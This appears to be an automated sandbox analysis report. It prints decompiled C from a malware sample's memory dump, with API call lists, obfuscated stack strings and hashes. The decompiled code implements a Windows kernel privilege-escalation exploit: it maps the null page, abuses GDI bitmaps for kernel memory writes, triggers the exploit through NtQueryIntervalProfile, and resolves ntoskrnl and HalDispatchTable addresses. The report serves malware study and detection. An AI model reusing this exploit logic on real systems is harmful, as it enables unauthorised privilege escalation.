Uniqueness Score: 100.00%

Function 0040D6E6, Relevance: 58.2, APIs: 14, Strings: 19, Instructions: 470
windowlibraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 60%

			E0040D6E6() {
				char _v6;
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				void _v40;
				struct HBITMAP__* _v44;
				char* _v48;
				intOrPtr _v52;
				short _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				short _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v79;
				intOrPtr _v83;
				char _v84;
				short _v86;
				intOrPtr _v90;
				char _v91;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				void _v108;
				char _v112;
				struct HBITMAP__* _v116;
				char _v120;
				struct HINSTANCE__* _v124;
				char _v128;
				int _v134;
				short _v136;
				short _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				long _v156;
				char _v160;
				struct _MEMORY_BASIC_INFORMATION _v188;
				intOrPtr _v508;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char _v536;
				intOrPtr _v660;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				long _v688;
				intOrPtr _v692;
				long _v696;
				char _v700;
				signed int _v968;
				intOrPtr _v972;
				char _v976;
				void _v1360;
				intOrPtr _v1432;
				void* __ebx;
				void* __ebp;
				short _t149;
				short _t150;
				short _t151;
				_Unknown_base(*)()* _t158;
				signed int _t161;
				intOrPtr _t162;
				char _t163;
				void* _t171;
				intOrPtr* _t173;
				signed int _t175;
				struct HBITMAP__* _t180;
				signed int _t183;
				char _t185;
				signed int _t199;
				void* _t209;
				char _t210;
				void* _t224;
				signed int _t225;
				signed int _t232;
				struct HINSTANCE__* _t236;
				struct HBITMAP__* _t238;
				struct HINSTANCE__* _t239;
				struct HBITMAP__* _t240;
				short _t241;
				signed int _t246;
				struct HINSTANCE__* _t257;
				char* _t259;
				short _t264;
				intOrPtr _t266;
				char _t270;
				intOrPtr* _t276;
				void* _t278;
				struct HBITMAP__* _t279;

				_t149 = 0x6e;
				_v152 = _t149;
				_t150 = 0x74;
				_t241 = 0x64;
				_t264 = 0x6c;
				_v150 = _t150;
				_t151 = 0x2e;
				_v142 = _t151;
				_v134 = 0;
				_v148 = _t241;
				_v146 = _t264;
				_v144 = _t264;
				_v140 = _t241;
				_v138 = _t264;
				_v136 = _t264;
				_t236 = GetModuleHandleW( &_v152);
				_v124 = _t236;
				_v160 = 0;
				_v104 = 0;
				_v100 = 0;
				_v48 = 0;
				_v40 = 0;
				_v32 = 0;
				_v96 = 0;
				_v52 = 0;
				E0040D348( &_v976, 0x114);
				_v976 = 0x114;
				_v68 = 0x476c7452;
				_v64 = 0x65567465;
				_v60 = 0x6f697372;
				_v56 = 0x6e;
				_t158 = GetProcAddress(_t236,  &_v68);
				 *_t158( &_v976);
				_t266 = 4;
				if(_v972 != 5) {
					__eflags = _v972 - 6;
					if(_v972 != 6) {
						L20:
						return 0;
					}
					_t161 = E00410679();
					__eflags = _t161;
					if(_t161 == 0) {
						__eflags = _v968;
						 *0x4198f0 = 0x94;
						if(_v968 != 0) {
							_t162 = E0040E46A();
							 *0x4198d4 = 0x1226;
							 *0x4198d8 = 0xf8;
							 *0x4198dc = 0x50;
							 *0x4198e0 = 0xb8;
							 *0x4198e8 = 0xb4;
						} else {
							_t162 = E0040E46A();
							 *0x4198d4 = 0x121b;
							 *0x4198d8 = 0xe0;
							 *0x4198dc = 0x48;
							 *0x4198e0 = 0xa0;
							 *0x4198e8 = 0x9c;
						}
						_v52 = _t266;
						_v96 = _t162;
						L14:
						 *0x4198e4 = 0x124;
						L15:
						_v188.BaseAddress = _v188.BaseAddress & 0x00000000;
						_t163 = 0x74;
						_t246 = 6;
						_v91 = _t163;
						_v84 = _t163;
						_v79 = _t163;
						memset( &(_v188.AllocationBase), 0, _t246 << 2);
						_v36 = 0x100;
						_v156 = 0x1000;
						_v92 = 0x4e;
						_v90 = 0x6f6c6c41;
						_v86 = 0x6163;
						_v83 = 0x72695665;
						_v78 = 0x4d6c6175;
						_v74 = 0x726f6d65;
						_v70 = 0x79;
						VirtualQuery(0x100,  &_v188, 0x1000);
						_t276 = GetProcAddress(_t236,  &_v92);
						if(_t276 == 0) {
							goto L20;
						}
						_t171 =  *((intOrPtr*)(E004010BB(_t236, 1, 0xd89ad05)))();
						_push(4);
						_push(0x3000);
						_push( &_v156);
						_push(0);
						_push( &_v36);
						_push(_t171);
						if( *_t276() != 0) {
							goto L20;
						}
						_t173 = E004010BB(0, 3, 0xb6e01c85);
						_push(0);
						_push(0x20000);
						_push(0);
						_push(0);
						if( *_t173() != 0) {
							_t175 = E0040D363(_t174);
							__eflags = _t175;
							if(_t175 == 0) {
								goto L18;
							}
							E0040D337( &_v1360, 0xffffff90, 0x180);
							_t180 = CreateBitmap(0x60, 1, 1, 0x20,  &_v1360);
							_t269 = _t180;
							_v44 = _t180;
							_t238 = CreateBitmap(0x60, 1, 1, 0x20,  &_v1360);
							_v116 = _t238;
							_t183 = E00410679();
							__eflags = _t183;
							if(_t183 == 0) {
								_t278 = E0040DF8E(_t269);
								_t185 = E0040DF8E(_t238);
								_v32 = _v32 & 0x00000000;
								_t112 = _t278 - 4; // -4
								_t270 = _t185;
								 *0x2c = _t112;
								 *0x14 = _t270;
								E0040D348( &_v536, 0x15c);
								_v536 = _t270;
								_v532 = _t270;
								_v528 = 0x180;
								_v524 = 0xabcd;
								_v520 = 6;
								_v516 = 0x10000;
								_v508 = 0x4800200;
								_v48 =  &_v536;
								asm("pushad");
								_push(_v48);
								E0040DF1E();
								_v1432 = 0x44;
								asm("popad");
								_v40 = _v40 & 0x00000000;
								_v108 = _v52 + _v96;
								_v32 = E0040E658;
								SetBitmapBits(_v44, 4,  &_v108);
								_t279 = _v116;
								GetBitmapBits(_t279, 4,  &_v40);
								_t135 =  &_v32; // 0x40e658
								SetBitmapBits(_t279, 4, _t135);
								_t239 = _v124;
								_v28 = 0x7551744e;
								_v24 = 0x49797265;
								_v20 = 0x7265746e;
								_v16 = 0x506c6176;
								_v12 = 0x69666f72;
								_v8 = 0x656c;
								_v6 = 0;
								_t199 = GetProcAddress(_t239,  &_v28);
								 *0x4198ec = _t199;
								__eflags = _t199;
								if(_t199 != 0) {
									L29:
									 *_t199(0x1337,  &_v160);
									SetBitmapBits(_t279, 4,  &_v40);
									L30:
									VirtualFree(_v36, 0, 0x8000);
									return 1;
								}
								_t199 = GetProcAddress(_t239,  &_v28);
								 *0x4198ec = _t199;
								__eflags = _t199;
								if(_t199 == 0) {
									L25:
									_push(0x8000);
									_push(0);
									L19:
									VirtualFree(_v36, ??, ??);
									goto L20;
								}
								goto L29;
							}
							E0040D348( &_v700, 0x200);
							_t209 = E0040DFB0(0x1000, __eflags, _t269);
							_t210 = E0040DFB0(0x1000, __eflags, _t238);
							 *0x28 = _t210;
							_v700 = _t210;
							_v692 = _t210;
							asm("adc edi, 0xffffffff");
							 *0x2c = 0x1000;
							_v696 = 0x1000;
							_v688 = 0x1000;
							asm("cdq");
							_push(0x1000);
							_push( &_v700);
							_push(1);
							_push(0);
							_push(0x1307);
							 *0x50 = _t209 + 0xfffffff8;
							 *0x54 = 0x1000;
							_v684 = 0x180;
							_v680 = 0xabcd;
							_v676 = 6;
							_v672 = 0x10000;
							_v660 = 0x4800200;
							E00410C44();
							_t257 = 0;
							asm("adc ecx, [ebp-0x24]");
							_v128 = _v32 + _v48;
							asm("cdq");
							_push(0x1000);
							_push( &_v128);
							_v124 = _t257;
							_push(0);
							asm("cdq");
							_v120 = 0;
							_v116 = 0;
							E00410C44(0x10b4, 0, 3, _v44, 0x1000, 8);
							asm("cdq");
							_t259 =  &_v120;
							_v44 = 0x1000;
							_v52 = _t259;
							_t240 = _v44;
							_push(_t240);
							_push(_t259);
							_push(0);
							asm("cdq");
							_t282 = _t238;
							E00410C44(0x10de, 0, 3, _t238, 0x1000, 8);
							asm("cdq");
							_push(0x1000);
							_push( &_v104);
							_push(0);
							E00410C44(0x10b4, 0, 3, _t238, 0x1000, 8);
							_t224 = E00410813(0x1000,  &_v152);
							_v28 = 0x7551744e;
							_v24 = 0x49797265;
							_v20 = 0x7265746e;
							_v16 = 0x506c6176;
							_v12 = 0x69666f72;
							_v8 = 0x656c;
							_v6 = 0;
							_t225 = E00410936(0x1000, __eflags, _t224, 0x1000,  &_v28);
							_v32 = _t225;
							__eflags = _t225 | 0x00001000;
							_v44 = 0x1000;
							if((_t225 | 0x00001000) != 0) {
								asm("cdq");
								_push(0x1000);
								_v112 = 0;
								_v108 = 0;
								E00410B1A(_v32, _v44, 2, 0x1337, 0,  &_v112);
								_push(_t240);
								_push(_v52);
								_push(0);
								E00410C44(0x10b4, 0, 3, _t282, 0x1000, 8);
								goto L30;
							}
							goto L25;
						}
						L18:
						_push(0x8000);
						_push(0);
						goto L19;
					}
					__eflags = _v968;
					 *0x4198f0 = 0xf8;
					if(__eflags != 0) {
						_v48 = E0040DFE5(__eflags);
						_v40 = _t264;
						asm("cdq");
						_v104 = E00410DE4;
						 *0x4198d8 = 0x208;
						 *0x4198dc = 0x70;
						 *0x4198e0 = 0x188;
						 *0x4198e8 = 0x180;
						 *0x4198e4 = 0x188;
					} else {
						_v48 = E0040DFE5(__eflags);
						_v40 = _t264;
						asm("cdq");
						_v104 = E00410DA4;
						 *0x4198d8 = 0x168;
						 *0x4198dc = 0x68;
						 *0x4198e0 = 0xe0;
						 *0x4198e8 = 0xe8;
						 *0x4198e4 = 0x188;
					}
					_t232 = 8;
					_v100 = _t264;
					_v32 = _t232;
					goto L15;
				}
				if(E00410679() == 0) {
					 *0x4198d8 = 0xd8;
					 *0x4198dc = 0x38;
					 *0x4198e0 = 0x98;
					 *0x4198e8 = 0x94;
					goto L14;
				}
				 *0x4198d8 = 0x160;
				 *0x4198dc = 0x68;
				 *0x4198e0 = 0xe0;
				 *0x4198e8 = 0xd8;
				 *0x4198e4 = 0x188;
				goto L15;
			}

0x0040d6f4
0x0040d6f7
0x0040d6fe
0x0040d701
0x0040d704
0x0040d705
0x0040d70e
0x0040d70f
0x0040d718
0x0040d725
0x0040d72c
0x0040d733
0x0040d73a
0x0040d741
0x0040d748
0x0040d757
0x0040d75e
0x0040d767
0x0040d76f
0x0040d772
0x0040d775
0x0040d778
0x0040d77b
0x0040d77e
0x0040d781
0x0040d784
0x0040d78e
0x0040d79c
0x0040d7a3
0x0040d7aa
0x0040d7b1
0x0040d7b7
0x0040d7c0
0x0040d7cb
0x0040d7cc
0x0040d83b
0x0040d842
0x0040da67
0x00000000
0x0040da67
0x0040d848
0x0040d84d
0x0040d84f
0x0040d8ff
0x0040d906
0x0040d910
0x0040d94b
0x0040d950
0x0040d95a
0x0040d964
0x0040d96e
0x0040d978
0x0040d912
0x0040d912
0x0040d917
0x0040d921
0x0040d92b
0x0040d935
0x0040d93f
0x0040d93f
0x0040d982
0x0040d985
0x0040d988
0x0040d988
0x0040d992
0x0040d992
0x0040d9a1
0x0040d9a4
0x0040d9a5
0x0040d9ad
0x0040d9b0
0x0040d9b5
0x0040d9be
0x0040d9cb
0x0040d9d1
0x0040d9d5
0x0040d9dc
0x0040d9e2
0x0040d9e9
0x0040d9f0
0x0040d9f7
0x0040d9fd
0x0040da0a
0x0040da0e
0x00000000
0x00000000
0x0040da1e
0x0040da20
0x0040da22
0x0040da2f
0x0040da30
0x0040da34
0x0040da35
0x0040da3a
0x00000000
0x00000000
0x0040da43
0x0040da4a
0x0040da4b
0x0040da50
0x0040da51
0x0040da56
0x0040da71
0x0040da77
0x0040da79
0x00000000
0x00000000
0x0040da89
0x0040daa6
0x0040daa8
0x0040dab9
0x0040dabe
0x0040dac0
0x0040dac3
0x0040dac8
0x0040daca
0x0040dc95
0x0040dc97
0x0040dc9c
0x0040dca0
0x0040dca3
0x0040dca5
0x0040dcb1
0x0040dcbd
0x0040dcc8
0x0040dcd1
0x0040dcd7
0x0040dce1
0x0040dceb
0x0040dcf5
0x0040dcff
0x0040dd09
0x0040dd0c
0x0040dd0d
0x0040dd10
0x0040dd15
0x0040dd1d
0x0040dd24
0x0040dd2e
0x0040dd3a
0x0040dd41
0x0040dd43
0x0040dd4d
0x0040dd53
0x0040dd5a
0x0040dd5c
0x0040dd64
0x0040dd6b
0x0040dd72
0x0040dd79
0x0040dd80
0x0040dd87
0x0040dd8d
0x0040dd91
0x0040dd97
0x0040dd9c
0x0040dd9e
0x0040ddb8
0x0040ddc4
0x0040ddcd
0x0040ddcf
0x0040ddd9
0x00000000
0x0040dde1
0x0040dda5
0x0040ddab
0x0040ddb0
0x0040ddb2
0x0040dc41
0x0040dc41
0x0040dc46
0x0040da5e
0x0040da61
0x00000000
0x0040da61
0x00000000
0x0040ddb2
0x0040dadc
0x0040dae2
0x0040daec
0x0040daf1
0x0040daf9
0x0040daff
0x0040db05
0x0040db08
0x0040db14
0x0040db1a
0x0040db20
0x0040db21
0x0040db22
0x0040db23
0x0040db25
0x0040db27
0x0040db2c
0x0040db32
0x0040db38
0x0040db42
0x0040db4c
0x0040db56
0x0040db60
0x0040db6a
0x0040db77
0x0040db78
0x0040db7b
0x0040db81
0x0040db82
0x0040db83
0x0040db87
0x0040db8c
0x0040db8f
0x0040db9a
0x0040db9d
0x0040dba0
0x0040dbab
0x0040dbac
0x0040dbae
0x0040dbb3
0x0040dbb6
0x0040dbb9
0x0040dbba
0x0040dbbb
0x0040dbbd
0x0040dbc2
0x0040dbcf
0x0040dbd7
0x0040dbd8
0x0040dbd9
0x0040dbda
0x0040dbe9
0x0040dbf8
0x0040dc00
0x0040dc0a
0x0040dc11
0x0040dc18
0x0040dc1f
0x0040dc26
0x0040dc2c
0x0040dc30
0x0040dc37
0x0040dc3a
0x0040dc3c
0x0040dc3f
0x0040dc52
0x0040dc53
0x0040dc60
0x0040dc66
0x0040dc69
0x0040dc6e
0x0040dc6f
0x0040dc72
0x0040dc81
0x00000000
0x0040dc86
0x00000000
0x0040dc3f
0x0040da58
0x0040da58
0x0040da5d
0x00000000
0x0040da5d
0x0040d855
0x0040d85c
0x0040d866
0x0040d8b5
0x0040d8bd
0x0040d8c0
0x0040d8c1
0x0040d8c9
0x0040d8d3
0x0040d8dd
0x0040d8e2
0x0040d8ec
0x0040d868
0x0040d86d
0x0040d875
0x0040d878
0x0040d879
0x0040d87c
0x0040d886
0x0040d890
0x0040d89a
0x0040d8a4
0x0040d8a4
0x0040d8f3
0x0040d8f4
0x0040d8f7
0x00000000
0x0040d8f7
0x0040d7d5
0x0040d80e
0x0040d818
0x0040d822
0x0040d82c
0x00000000
0x0040d82c
0x0040d7d7
0x0040d7e1
0x0040d7eb
0x0040d7f5
0x0040d7ff
0x00000000

APIs

GetModuleHandleW.KERNEL32(?,2CA1B5F0,7757BFA8,00000000), ref: 0040D74F
GetProcAddress.KERNEL32(00000000,?), ref: 0040D7B7

Part of subcall function 00410679: GetModuleHandleW.KERNEL32(?,?), ref: 004106E4
Part of subcall function 00410679: GetProcAddress.KERNEL32(00000000), ref: 004106EB
Part of subcall function 00410679: GetCurrentProcess.KERNEL32(00000000), ref: 00410702

SetBitmapBits.GDI32(?,00000004,00000000), ref: 0040DDCD

Part of subcall function 0040DFE5: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E120
Part of subcall function 0040DFE5: lstrlenW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E214
Part of subcall function 0040DFE5: GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040E238
Part of subcall function 0040DFE5: lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E24A
Part of subcall function 0040DFE5: lstrlenW.KERNEL32(?,?,?,?,?,00000000,?,0000004E,?,00000004,7757CE44,00000000), ref: 0040E255
Part of subcall function 0040DFE5: lstrlenW.KERNEL32(?), ref: 0040E386

Part of subcall function 0040E46A: LoadLibraryW.KERNEL32(?), ref: 0040E4FD
Part of subcall function 0040E46A: GetProcAddress.KERNEL32(00000000,EDc), ref: 0040E510
Part of subcall function 0040E46A: LoadLibraryExW.KERNEL32(00000000,00000000,00000001), ref: 0040E587
Part of subcall function 0040E46A: LoadLibraryExW.KERNEL32(?,00000000,00000001), ref: 0040E5F4
Part of subcall function 0040E46A: GetProcAddress.KERNEL32(00000000,?), ref: 0040E643

VirtualQuery.KERNEL32(00000100,00000000,00001000), ref: 0040D9FD
GetProcAddress.KERNEL32(00000000,0000004E), ref: 0040DA08
VirtualFree.KERNEL32(00000100,00000000,00008000), ref: 0040DDD9

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

VirtualFree.KERNEL32(00000100,00000000,00008000), ref: 0040DA61
CreateBitmap.GDI32(00000060,00000001,00000001,00000020,?), ref: 0040DAA6
CreateBitmap.GDI32(00000060,00000001,00000001,00000020,?), ref: 0040DABC
SetBitmapBits.GDI32(?,00000004,?), ref: 0040DD41
GetBitmapBits.GDI32(?,00000004,00000000), ref: 0040DD4D
SetBitmapBits.GDI32(?,00000004,X@), ref: 0040DD5A
GetProcAddress.KERNEL32(?,?), ref: 0040DD91
GetProcAddress.KERNEL32(?,7551744E), ref: 0040DDA5

Strings

n, xrefs: 0040D7B1
RtlG, xrefs: 0040D79C
eryI, xrefs: 0040DD6B
N, xrefs: 0040D9D1
emor, xrefs: 0040D9F0
NtQu, xrefs: 0040DD64
D, xrefs: 0040DD15
nter, xrefs: 0040DD72
valP, xrefs: 0040DD79
Allo, xrefs: 0040D9D5
X@, xrefs: 0040DD53, 0040DD56
y, xrefs: 0040D9F7
etVe, xrefs: 0040D7A3
rsio, xrefs: 0040D7AA
ca, xrefs: 0040D9DC
eVir, xrefs: 0040D9E2
rofi, xrefs: 0040DD80
le, xrefs: 0040DD87
ualM, xrefs: 0040D9E9

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressProc$Bitmap$BitsLibraryLoadVirtuallstrlen$Free$CreateHandleModule$CurrentDirectoryProcessQuerySystem
String ID: Allo$D$N$NtQu$RtlG$X@$ca$eVir$emor$eryI$etVe$le$n$nter$rofi$rsio$ualM$valP$y
API String ID: 2272248284-3514062804
Opcode ID: 76cb18b857e1cb54c620c78492ccb325ed8b1c86b1e553bdd31034bbeb8ff684
Instruction ID: d3f27820a70deab9d20ba841eb638e927be25ff8617e2308918b9eef97193977
Opcode Fuzzy Hash: 76cb18b857e1cb54c620c78492ccb325ed8b1c86b1e553bdd31034bbeb8ff684
Instruction Fuzzy Hash: C6125FB0D10359AEEB10DFA5DC45BDEBBF8EB05704F10806AE508BA291D7B45A88CF59

Uniqueness

Uniqueness Score: 100.00%

Function 0040DFE5, Relevance: 42.4, APIs: 10, Strings: 14, Instructions: 392
stringUNIQUE

Download Yara Rule

C-Code - Quality: 77%

			E0040DFE5(void* __eflags) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v46;
				char _v47;
				char _v48;
				intOrPtr _v52;
				char _v56;
				short _v61;
				char _v62;
				intOrPtr _v66;
				intOrPtr _v70;
				WCHAR* _v71;
				short _v73;
				char _v74;
				char _v76;
				short _v81;
				char _v82;
				char _v83;
				signed int _v84;
				short _v86;
				char _v87;
				char _v88;
				intOrPtr _v92;
				char _v93;
				signed int _v94;
				intOrPtr _v98;
				char _v99;
				char _v100;
				short _v102;
				signed int _v103;
				char _v104;
				char _v108;
				void* _v112;
				signed int _v116;
				WCHAR* _v120;
				short _v126;
				short _v128;
				intOrPtr _v132;
				short _v134;
				short _v136;
				short _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				signed int _v162;
				short _v164;
				short _v166;
				short _v168;
				signed int _v170;
				short _v172;
				short _v174;
				short _v176;
				short _v178;
				char _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				void* __ebx;
				short _t158;
				short _t159;
				short _t160;
				signed int _t163;
				char _t164;
				char _t165;
				signed int _t167;
				short _t177;
				short _t178;
				short _t179;
				short _t180;
				short _t181;
				short _t182;
				short _t183;
				short _t184;
				signed int _t190;
				int _t196;
				int _t202;
				signed int _t204;
				char _t210;
				void* _t212;
				void* _t216;
				int _t219;
				int _t226;
				int _t232;
				signed int _t234;
				signed int _t239;
				intOrPtr* _t242;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t250;
				WCHAR* _t251;
				short _t252;
				char _t253;
				short _t260;
				short _t261;
				char _t263;
				signed int _t270;
				void* _t273;
				short _t278;
				signed int _t279;
				signed int _t280;
				signed int _t282;
				signed int _t284;
				void* _t287;
				signed int _t288;
				signed int* _t291;
				WCHAR* _t294;
				void* _t295;
				void* _t296;
				void* _t298;

				_t298 = __eflags;
				_t158 = 0x6e;
				_v180 = _t158;
				_t159 = 0x74;
				_t252 = 0x64;
				_v178 = _t159;
				_t160 = 0x6c;
				_v174 = _t160;
				_v172 = _t160;
				_v166 = _t160;
				_v164 = _t160;
				_t279 = 0x2e;
				_v162 = 0;
				_v176 = _t252;
				_v170 = _t279;
				_v168 = _t252;
				_t163 = E00410813(_t279,  &_v180);
				_t248 = _t279;
				_v104 = 0x4e;
				_t280 = 0x74;
				_t284 = _t163;
				_v32 = _t248;
				_t164 = 0x65;
				_t253 = 0x72;
				_v100 = _t164;
				_v93 = _t164;
				_t165 = 0x6f;
				_v88 = _t165;
				_v82 = _t165;
				_v103 = _t280;
				_v102 = 0x7551;
				_v99 = _t253;
				_v98 = 0x73795379;
				_v94 = _t280;
				_v92 = 0x666e496d;
				_v87 = _t253;
				_v86 = 0x616d;
				_v84 = _t280;
				_v83 = 0x69;
				_v81 = 0x6e;
				_t167 = E00410936(_t280, _t298, _t284, _t248,  &_v104);
				_v36 = _t167;
				_v44 = _t280;
				if((_t167 | _t280) == 0 || (_t284 | _t248) == 0) {
					L26:
					__eflags = 0;
					return 0;
				} else {
					_t287 = E0040C6BA(0x10000);
					if(_t287 == 0) {
						goto L26;
					}
					asm("cdq");
					_push(_t280);
					_push( &_v40);
					_push(0);
					_push(0x10000);
					_v40 = 0;
					asm("cdq");
					_push(_t280);
					E00410B1A(_v36, _v44, 4, 0xb, 0, _t287);
					_t250 =  *(_t287 + 0x18);
					_t296 = _t295 + 0x2c;
					_v192 = _t250;
					_v44 =  *((intOrPtr*)(_t287 + 0x1c));
					VirtualFree(_t287, 0, 0x8000);
					_t302 = _t250 | _v44;
					if((_t250 | _v44) == 0) {
						goto L26;
					}
					_t260 = 0x6e;
					_t177 = 0x74;
					_v154 = _t177;
					_t178 = 0x6f;
					_v152 = _t178;
					_t179 = 0x73;
					_v150 = _t179;
					_t180 = 0x6b;
					_v148 = _t180;
					_t181 = 0x72;
					_v146 = _t181;
					_t182 = 0x6c;
					_v142 = _t182;
					_t183 = 0x2e;
					_v156 = _t260;
					_v144 = _t260;
					_t261 = 0x65;
					_v140 = _t183;
					_t184 = 0x78;
					_v136 = _t184;
					_v132 = 0;
					_v138 = _t261;
					_v134 = _t261;
					_t251 = E0040D37B(_t302,  &_v112);
					_v24 = 0;
					_v20 = 0;
					_v108 = 0;
					_t303 = _t251;
					if(_t251 == 0) {
						goto L26;
					}
					_t263 = 0x6c;
					_v12 = 0;
					_v8 = 0;
					_v46 = 0;
					_v56 = 0x4c72644c;
					_v52 = 0x4464616f;
					_v48 = _t263;
					_v47 = _t263;
					_t190 = E00410936(_t280, _t303, _t284, _v32,  &_v56);
					_v36 = _t190;
					_v32 = _t280;
					if((_t190 | _t280) == 0) {
						_t282 = _v8;
						_t266 = _v12;
						L22:
						_t288 = _v24;
						L23:
						_t316 = _v24 | _v20;
						if((_v24 | _v20) != 0) {
							E00410547(_t251, _t316, _t266, _t282, _v24, _v20, _v108);
						}
						asm("adc edi, [ebp-0x28]");
						return _t288 + _v192;
					}
					asm("cdq");
					_v120 = _t251;
					_v116 = _t280;
					_t196 = lstrlenW(_t251);
					_v40 = _v40 & 0x00000000;
					_v128 = _t196 + _t196;
					_v126 = _v128 + 2;
					E0041071A( &_v40);
					_t202 = GetSystemDirectoryW(0, 0);
					_v16 = _t202;
					if(_t202 != 0) {
						_t226 = lstrlenW(_t251);
						_t294 = E0040C6BA(4 + (lstrlenW( &_v156) + _t226 + _v16) * 2);
						if(_t294 != 0) {
							_t232 = GetSystemDirectoryW(_t294, _v16);
							_push(_t294);
							if(_t232 != 0) {
								_t234 = lstrlenW();
								_t273 = 0x5c;
								_t308 =  *((intOrPtr*)(_t294 + _t234 * 2 - 2)) - _t273;
								if( *((intOrPtr*)(_t294 + _t234 * 2 - 2)) != _t273) {
									_t247 = lstrlenW(_t294);
									_t278 = 0x5c;
									_t294[_t247] = _t278;
								}
								_v28 = lstrlenW(_t294);
								E00401A92(_t294, _t251);
								_t239 = E004102FA(_t308, _t294, 0,  &_v24,  &_v108);
								_t296 = _t296 + 0x18;
								_v12 = _t239;
								_v8 = _t280;
								if((_t239 | _t280) == 0) {
									_t294[_v28] = 0;
									_t242 = E004010BB(_t251, 1, 0x2ca1b5f0);
									 *_t242(_t294,  &_v156);
									_t246 = E004102FA(0, _t294, 0,  &_v24,  &_v108);
									_t296 = _t296 + 0x10;
									_v12 = _t246;
									_v8 = _t280;
								}
								_push(_t294);
							}
							E0040C6D1();
						}
					}
					_t204 = _v12 | _v8;
					if(_t204 == 0) {
						_v196 = _v196 & _t204;
						asm("cdq");
						_t291 =  &_v12;
						_v200 = 1;
						_t270 = _t280;
						_push(_t270);
						_push(_t291);
						asm("cdq");
						_v16 = _t280;
						_push(_v16);
						_v28 =  &_v128;
						_push(_v28);
						asm("cdq");
						_push(_t280);
						_v184 = _t270;
						_v112 =  &_v200;
						_v188 = _t280;
						_t216 = E00410B1A(_v36, _v32, 4, 0, 0,  &_v200);
						_t296 = _t296 + 0x2c;
						if(_t216 != 0 || (_v12 | _v8) == 0) {
							asm("cdq");
							_v120 =  &_v156;
							_v116 = _t280;
							_t219 = lstrlenW( &_v156);
							_push(_v184);
							_push(_t291);
							_push(_v16);
							_v128 = _t219 + _t219;
							_push(_v28);
							_push(_v188);
							_v126 = _v128 + 2;
							E00410B1A(_v36, _v32, 4, 0, 0, _v112);
							_t296 = _t296 + 0x2c;
						}
					}
					E00410A5F( &_v40);
					E0040C6D1(_t251);
					_t282 = _v8;
					_t266 = _v12;
					_t315 = _t266 | _t282;
					if((_t266 | _t282) == 0) {
						goto L22;
					} else {
						_t210 = 0x6c;
						_t251 = 0x73;
						_v74 = _t210;
						_v62 = _t210;
						_v76 = 0x6148;
						_v73 = 0x6944;
						_v71 = _t251;
						_v70 = 0x63746170;
						_v66 = 0x62615468;
						_v61 = 0x65;
						_t212 = E00410936(_t282, _t315, _t266, _t282,  &_v76);
						_t266 = _v12;
						_t288 = _t212 - _v12;
						_t282 = _v8;
						asm("sbb edi, edx");
						goto L23;
					}
				}
			}

0x0040dfe5
0x0040dff3
0x0040dff6
0x0040dffd
0x0040e000
0x0040e003
0x0040e00a
0x0040e00b
0x0040e012
0x0040e019
0x0040e020
0x0040e02b
0x0040e02c
0x0040e039
0x0040e040
0x0040e047
0x0040e04e
0x0040e055
0x0040e057
0x0040e05b
0x0040e05e
0x0040e060
0x0040e063
0x0040e066
0x0040e069
0x0040e06c
0x0040e06f
0x0040e070
0x0040e073
0x0040e07c
0x0040e07f
0x0040e085
0x0040e088
0x0040e08f
0x0040e092
0x0040e099
0x0040e09c
0x0040e0a2
0x0040e0a5
0x0040e0a9
0x0040e0af
0x0040e0b6
0x0040e0bb
0x0040e0be
0x0040e45f
0x0040e461
0x00000000
0x0040e0ce
0x0040e0d9
0x0040e0de
0x00000000
0x00000000
0x0040e0e9
0x0040e0ea
0x0040e0eb
0x0040e0ec
0x0040e0ed
0x0040e0f0
0x0040e0f3
0x0040e0f4
0x0040e101
0x0040e106
0x0040e109
0x0040e10f
0x0040e115
0x0040e120
0x0040e128
0x0040e12b
0x00000000
0x00000000
0x0040e133
0x0040e136
0x0040e139
0x0040e140
0x0040e143
0x0040e14a
0x0040e14d
0x0040e154
0x0040e157
0x0040e15e
0x0040e161
0x0040e168
0x0040e16b
0x0040e172
0x0040e175
0x0040e17c
0x0040e183
0x0040e184
0x0040e18d
0x0040e18e
0x0040e197
0x0040e19e
0x0040e1a5
0x0040e1b1
0x0040e1b5
0x0040e1b8
0x0040e1bb
0x0040e1bf
0x0040e1c1
0x00000000
0x00000000
0x0040e1c9
0x0040e1ca
0x0040e1cd
0x0040e1d0
0x0040e1da
0x0040e1e2
0x0040e1e9
0x0040e1ec
0x0040e1ef
0x0040e1f6
0x0040e1fb
0x0040e1fe
0x0040e429
0x0040e42c
0x0040e42f
0x0040e42f
0x0040e435
0x0040e438
0x0040e43b
0x0040e448
0x0040e44d
0x0040e458
0x00000000
0x0040e45b
0x0040e20c
0x0040e20e
0x0040e211
